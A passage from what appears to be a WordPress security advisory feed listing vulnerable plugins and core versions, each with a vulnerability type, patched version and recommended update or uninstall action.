Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: User Activity Tracking and Log

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.9
Recommended Action: Update to version 4.0.9, or a newer patched version

Plugin: Better Delete Revision

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WCFM Membership – WooCommerce Memberships for Multivendor Marketplace

Vulnerability: Unauthenticated Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: 2.11.0
Recommended Action: Update to version 2.11.0, or a newer patched version

Plugin: Bulk Comment Remove

Vulnerability: Cross-Site Request Forgery via brc_admin()
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Prevent Landscape Rotation

Vulnerability: Cross-Site Request Forgery via adminpage.php
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: WordPress Tag, Category, and Taxonomy Manager – AI Autotagger

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: MemberSonic Lite Membership Site Plugin

Vulnerability: Authentication Bypass
Patched Version: 1.302
Recommended Action: Update to version 1.302, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.19
Recommended Action: Update to version 2.0.19, or a newer patched version

Plugin: flickr-picture-backup

Vulnerability: Arbitrary file upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Min Max Control – Min Max Quantity & Step Control for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: BookX

Vulnerability: Path Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Store Locator WordPress

Vulnerability: Reflected Cross-Site Scripting via ‘asl-nounce’
Patched Version: 1.4.13
Recommended Action: Update to version 1.4.13, or a newer patched version

Plugin: WordPress Spreadsheet

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Konnichiwa! Membership

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Multisite Content Copier/Updater

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: IMPress for IDX Broker

Vulnerability: Authenticated Arbitrary Post Creation, Modification, and Deletion
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Featured Image from URL (FIFU)

Vulnerability: Missing Authorization on REST API routes
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Advanced Woo Search

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.78
Recommended Action: Update to version 2.78, or a newer patched version

Plugin: WooCommerce

Vulnerability: Insecure Direct Object Reference via order_id Parameter
Patched Version: 4.7.0
Recommended Action: Update to version 4.7.0, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: Registration | User Registration and Invitation Codes Plugin for WordPress

Vulnerability: PHP Object Injection
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Contest Gallery Pro

Vulnerability: Authenticated (Administrator+) SQL Injection via wp_user_id
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Import and export users and customers

Vulnerability: Missing Authorization via fire_cron REST endpoint
Patched Version: 1.24.7
Recommended Action: Update to version 1.24.7, or a newer patched version

Plugin: Pixel Cat – Conversion Pixel Manager

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting via Global Variables
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: SpiderCalendar

Vulnerability: SQL Injection
Patched Version: 1.5.52
Recommended Action: Update to version 1.5.52, or a newer patched version

Plugin: Debug Assistant

Vulnerability: Cross-Site Request Forgery via imlt_create_admin
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: MainWP Post Dripper Extension

Vulnerability: Missing Authorization to Arbitrary Page/Post Deletion
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: FareHarbor for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.6.8
Recommended Action: Update to version 3.6.8, or a newer patched version

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.9.25
Recommended Action: Update to version 1.9.25, or a newer patched version

Plugin: Floating Action Button

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Related Posts for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Clicky by Yoast

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.9.8
Recommended Action: Update to version 2.9.8, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via Comments via URLs
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.14, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: Easy Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.9.3
Recommended Action: Update to version 3.9.3, or a newer patched version

Plugin: Prismatic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Auto-hyperlink URLs

Vulnerability: Tab Nabbing
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clearfy Cache – WordPress optimization plugin, Minify HTML, CSS & JS, Defer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 13.2.6
Recommended Action: Update to version 13.2.6, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: wordTube

Vulnerability: Remote File Inclusion
Patched Version: 1.44
Recommended Action: Update to version 1.44, or a newer patched version

Plugin: Easy Hide Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: FoxyPress

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Event Calendar – Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Movies

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Customer Reviews for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.12.1
Recommended Action: Update to version 5.12.1, or a newer patched version

Core: WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.34
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.34, 3.8.34, 3.9.32, 4.0.31, 4.1.31, 4.2.28, 4.3.24, 4.4.23, 4.5.22, 4.6.19, 4.7.18, 4.8.14, 4.9.15, 5.0.10, 5.1.6, 5.2.7, 5.3.4, 5.4.2

Plugin: Form Builder | Create Responsive Contact Forms

Vulnerability: Unauthenticated CSV Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: St-Daily-Tip

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Chatbot for Messenger

Vulnerability: Missing Authorization
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: HTTP Auth

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices, packing slips and more

Vulnerability: Authenticated (Subscriber+) SQL Injection via Export
Patched Version: 1.2.90
Recommended Action: Update to version 1.2.90, or a newer patched version

Plugin: WP Tabs – Responsive Tabs and Custom Product Tabs

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: WP Header Images

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: UserAgent-Spy

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Memory Usage, Memory Limit, PHP and Server Memory Health Check and Provide Suggestions

Vulnerability: Missing Authorization to Arbitrary Plugin Installation
Patched Version: 2.46
Recommended Action: Update to version 2.46, or a newer patched version

Plugin: WP Blog and Widgets

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: ALD – Dropshipping and Fulfillment for AliExpress and WooCommerce

Vulnerability: Cross-Site Request Forgery to Order Information Disclosure
Patched Version: 1.0.22
Recommended Action: Update to version 1.0.22, or a newer patched version

Plugin: Hana Flv Player

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.8
Recommended Action: Update to version 2.5.8, or a newer patched version

Plugin: Highlight Sitewide Notice, Text, Button Menu

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.9.3
Recommended Action: Update to version 0.9.3, or a newer patched version

Plugin: WP Easy Gallery – WordPress Gallery Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Content Audit

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Husker Portfolio

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ipBlockList

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pinpoint Booking System – #1 WordPress Booking Plugin

Vulnerability: Authenticated SQL Injection
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.4.0
Recommended Action: Update to version 8.4.0, or a newer patched version

Plugin: Product Slider for WooCommerce by PickPlugins

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.13.42
Recommended Action: Update to version 1.13.42, or a newer patched version

Plugin: WP Repost

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BZScore – Live Score

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shortcode Menu

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Faculty Staff and Student Directory Plugin – Campus Directory

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Auto Affiliate Links

Vulnerability: SQL Injection
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: Easy Digital Downloads – PDF stamper

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting in Various Blocks
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Core: WordPress

Vulnerability: Authenticated Information Disclosure via REST-API
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Contact Form DB – Elementor

Vulnerability: Elementor <= 1.7
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: Easy Registration Forms

Vulnerability: CSV Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Profile Extra Fields by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery on ajax_save_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Simple:Press Forum

Vulnerability: Authenticated (Subscriber+) Path Traversal to Arbitrary File Deletion
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service via Long Password
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: Simple Event Planner

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Form Settings
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: Easy Org Chart

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Floating Social Media Links

Vulnerability: Remote File Inclusion via fsml-hideshow.js.php wpp parameter
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 2.9.2
Recommended Action: Update to version 2.9.2, or a newer patched version

Plugin: Duplicate Page

Vulnerability: No subtitle
Patched Version: 4.4.2
Recommended Action: Update to version 4.4.2, or a newer patched version

Plugin: Flickr Justified Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Contact Form Builder, Contact Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Lazy Social Comments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Options
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Sensitive Data Exposure
Patched Version: 3.9.6
Recommended Action: Update to version 3.9.6, or a newer patched version

Plugin: Sociable

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP All Export Pro

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: WC Sales Notification

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.6.2
Recommended Action: Update to version 3.6.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: CSV Injection
Patched Version: 3.3.14
Recommended Action: Update to version 3.3.14, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Missing Authorization
Patched Version: 1.14.8
Recommended Action: Update to version 1.14.8, or a newer patched version

Plugin: YourMembership Single Sign On – YM SSO Login

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: LayerSlider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 7.7.10
Recommended Action: Update to version 7.7.10, or a newer patched version

Plugin: GD Rating System

Vulnerability: Directory Traversal
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Social Feed Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.8
Recommended Action: Update to version 2.4.8, or a newer patched version

Plugin: WP CSV Exporter

Vulnerability: CSV Injection
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: MainWP UpdraftPlus Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: CPT Bootstrap Carousel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.13
Recommended Action: Update to version 1.13, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Authenticated (Admin+) SQL Injection via $email value
Patched Version: 9.9.4
Recommended Action: Update to version 9.9.4, or a newer patched version

Plugin: Timed Content

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.73
Recommended Action: Update to version 2.73, or a newer patched version

Plugin: WP Membership

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Qode Essential Addons

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Kit (formerly ConvertKit) – Email Newsletter, Email Marketing, Subscribers and Landing Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: wp-unique-article-header-image

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 10.0.2
Recommended Action: Update to version 10.0.2, or a newer patched version

Plugin: Download Manager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: History Timeline for Biography, Company History & Event Timeline

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woocommerce Vietnam Checkout

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Woocommerce Follow-ups

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.9.50
Recommended Action: Update to version 4.9.50, or a newer patched version

Plugin: surveys

Vulnerability: Authenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.1.3.1
Recommended Action: Update to version 4.1.3.1, or a newer patched version

Plugin: Media Library Categories

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: WP Page Numbers

Vulnerability: Cross-Site Request Forgery via wp_page_numbers_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clone

Vulnerability: Sensitive Information Exposure
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Google +1 by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: SEO Scout: Content Optimization, Keyword Research, Rank Tracking + SEO Testing

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Slider Feed

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Bootstrap Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wpForo Forum

Vulnerability: Privilege Escalation
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 2.9.52
Recommended Action: Update to version 2.9.52, or a newer patched version

Plugin: MAZ Loader – Preloader Builder for WordPress

Vulnerability: SQL Injection
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: BP Social Connect

Vulnerability: Authentication Bypass
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Add Shortcodes Actions And Filters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.20.3
Recommended Action: Update to version 6.20.3, or a newer patched version

Plugin: Custom Login Page

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Accept Stripe Payments

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.0.80
Recommended Action: Update to version 2.0.80, or a newer patched version

Plugin: Participants Database

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Arbitrary Roles and Capabilities Creation/Deletion
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: page-flip-image-gallery

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ReFlex Gallery » WordPress Photo Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Disable Right Click For WP

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.11.2
Recommended Action: Update to version 5.11.2, or a newer patched version

Plugin: Duplicate Post Page Menu & Custom Post Type

Vulnerability: Missing Authorization
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Cross-Site Request Forgery via getPluginStatus
Patched Version: 3.2.11
Recommended Action: Update to version 3.2.11, or a newer patched version

Plugin: Convert Pro

Vulnerability: Missing Authorization
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: On Page SEO + Social Live Chat (Formerly OPS)

Vulnerability: No subtitle
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: VM Backups

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Email

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.66
Recommended Action: Update to version 1.2.66, or a newer patched version

Plugin: WP Symposium

Vulnerability: SQL Injections
Patched Version: 12.12
Recommended Action: Update to version 12.12, or a newer patched version

Plugin: RokStories

Vulnerability: Cross-Site Scripting
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: ARI Stream Quiz – WordPress Quizzes Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Google Analytics Top Content Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: myghpay WooCommerce Payment Gateway

Vulnerability: No subtitle
Patched Version: No patched version available
